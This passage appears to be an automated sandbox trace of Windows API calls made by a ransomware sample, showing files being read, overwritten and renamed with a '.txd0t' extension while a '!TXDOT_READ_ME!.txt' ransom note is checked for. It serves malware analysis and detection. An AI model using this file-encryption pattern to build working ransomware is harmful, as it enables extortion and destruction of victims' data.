nNumberOfBytesToRead=0x426a0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x426a0, lpOverlapped=0x0) returned 1 [0087.676] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffbd960, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.676] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x426a0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x426a0, lpOverlapped=0x0) returned 1 [0087.677] FlushFileBuffers (hFile=0x474) returned 1 [0087.683] GetProcessHeap () returned 0xe30000 [0087.683] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf180 [0087.683] StrCpyW (in: psz1=0xecf180, psz2="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" [0087.683] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="ParameterInfo.xml" [0087.683] StrCpyW (in: psz1=0xecf1b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.683] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.683] GetProcessHeap () returned 0xe30000 [0087.683] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf180 | out: hHeap=0xe30000) returned 1 [0087.683] CloseHandle (hObject=0x474) returned 1 [0087.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.txd0t")) returned 1 [0087.684] SetEvent (hEvent=0x414) returned 1 [0087.684] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.688] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" [0087.688] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t" [0087.688] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t") returned 0 [0087.688] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", dwFileAttributes=0x80) returned 1 [0087.688] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.688] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=94720) returned 1 [0087.688] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.688] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.695] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8c00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.698] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x17200, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x17200, lpOverlapped=0x0) returned 1 [0087.702] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8e00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.702] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x17200, lpOverlapped=0x0) returned 1 [0087.702] FlushFileBuffers (hFile=0x474) returned 1 [0087.723] GetProcessHeap () returned 0xe30000 [0087.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf390 [0087.723] StrCpyW (in: psz1=0xecf390, psz2="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" [0087.723] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="RGB9Rast_x86.msi" [0087.723] StrCpyW (in: psz1=0xecf3c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.723] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.724] GetProcessHeap () returned 0xe30000 [0087.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf390 | out: hHeap=0xe30000) returned 1 [0087.724] CloseHandle (hObject=0x474) returned 1 [0087.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.txd0t")) returned 1 [0087.724] SetEvent (hEvent=0x414) returned 1 [0087.724] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.727] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" [0087.727] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t" [0087.727] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t") returned 0 [0087.727] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp", dwFileAttributes=0x80) returned 1 [0087.727] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.727] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=41080) returned 1 [0087.727] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.727] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.731] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff5d88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.731] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xa070, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0xa070, lpOverlapped=0x0) returned 1 [0087.734] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff5f90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.734] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xa070, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0xa070, lpOverlapped=0x0) returned 1 [0087.734] FlushFileBuffers (hFile=0x474) returned 1 [0087.755] GetProcessHeap () returned 0xe30000 [0087.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf9c0 [0087.755] StrCpyW (in: psz1=0xecf9c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" [0087.755] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="SplashScreen.bmp" [0087.755] StrCpyW (in: psz1=0xecf9f4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.755] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.756] GetProcessHeap () returned 0xe30000 [0087.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf9c0 | out: hHeap=0xe30000) returned 1 [0087.756] CloseHandle (hObject=0x474) returned 1 [0087.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.txd0t")) returned 1 [0087.756] SetEvent (hEvent=0x414) returned 1 [0087.756] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.766] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" [0087.766] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.txd0t" [0087.766] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.txd0t") returned 0 [0087.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp", dwFileAttributes=0x80) returned 1 [0087.767] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.767] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=104072) returned 1 [0087.767] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.767] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.769] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe6778, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.770] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x19680, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x19680, lpOverlapped=0x0) returned 1 [0087.774] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe6980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.774] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x19680, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x19680, lpOverlapped=0x0) returned 1 [0087.775] FlushFileBuffers (hFile=0x474) returned 1 [0087.794] GetProcessHeap () returned 0xe30000 [0087.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0087.794] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" [0087.794] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned="watermark.bmp" [0087.794] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.794] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.795] GetProcessHeap () returned 0xe30000 [0087.795] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.795] CloseHandle (hObject=0x474) returned 1 [0087.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.txd0t" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.txd0t")) returned 1 [0087.795] SetEvent (hEvent=0x414) returned 1 [0087.795] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.799] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Logs\\Internet Explorer.evtx" | out: psz1="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned="\\\\?\\C:\\Logs\\Internet Explorer.evtx" [0087.799] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Internet Explorer.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Internet Explorer.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Internet Explorer.evtx.txd0t" [0087.799] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Internet Explorer.evtx.txd0t") returned 0 [0087.799] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx", dwFileAttributes=0x80) returned 1 [0087.799] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.799] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0087.799] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.799] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.800] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.800] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x11000, lpOverlapped=0x0) returned 1 [0087.803] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.803] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x11000, lpOverlapped=0x0) returned 1 [0087.803] FlushFileBuffers (hFile=0x474) returned 1 [0087.925] GetProcessHeap () returned 0xe30000 [0087.925] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xec) returned 0xe9cb30 [0087.925] StrCpyW (in: psz1=0xe9cb30, psz2="\\\\?\\C:\\Logs\\Internet Explorer.evtx" | out: psz1="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned="\\\\?\\C:\\Logs\\Internet Explorer.evtx" [0087.925] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned="Internet Explorer.evtx" [0087.925] StrCpyW (in: psz1=0xe9cb48, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.925] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.925] GetProcessHeap () returned 0xe30000 [0087.925] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9cb30 | out: hHeap=0xe30000) returned 1 [0087.925] CloseHandle (hObject=0x474) returned 1 [0087.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.txd0t" (normalized: "c:\\logs\\internet explorer.evtx.txd0t")) returned 1 [0087.926] SetEvent (hEvent=0x414) returned 1 [0087.926] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.927] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0087.927] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t" [0087.927] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned 0 [0087.927] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", dwFileAttributes=0x80) returned 1 [0087.927] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.928] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0087.928] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.928] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.929] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.929] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x11000, lpOverlapped=0x0) returned 1 [0087.932] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.932] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x11000, lpOverlapped=0x0) returned 1 [0087.932] FlushFileBuffers (hFile=0x474) returned 1 [0087.938] GetProcessHeap () returned 0xe30000 [0087.938] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x132) returned 0xe9b648 [0087.938] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0087.938] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0087.938] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.938] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.938] GetProcessHeap () returned 0xe30000 [0087.938] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0087.938] CloseHandle (hObject=0x474) returned 1 [0087.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.txd0t")) returned 1 [0087.939] SetEvent (hEvent=0x414) returned 1 [0087.939] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.942] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0087.942] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t" [0087.942] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned 0 [0087.942] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0087.942] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.942] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0087.942] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.942] WriteFile (in: hFile=0x478, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.943] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.943] ReadFile (in: hFile=0x478, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0087.948] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.948] WriteFile (in: hFile=0x478, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0087.949] FlushFileBuffers (hFile=0x478) returned 1 [0087.954] GetProcessHeap () returned 0xe30000 [0087.954] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0087.954] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0087.954] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0087.954] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.954] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.954] GetProcessHeap () returned 0xe30000 [0087.954] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0087.954] CloseHandle (hObject=0x478) returned 1 [0087.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t" (normalized: 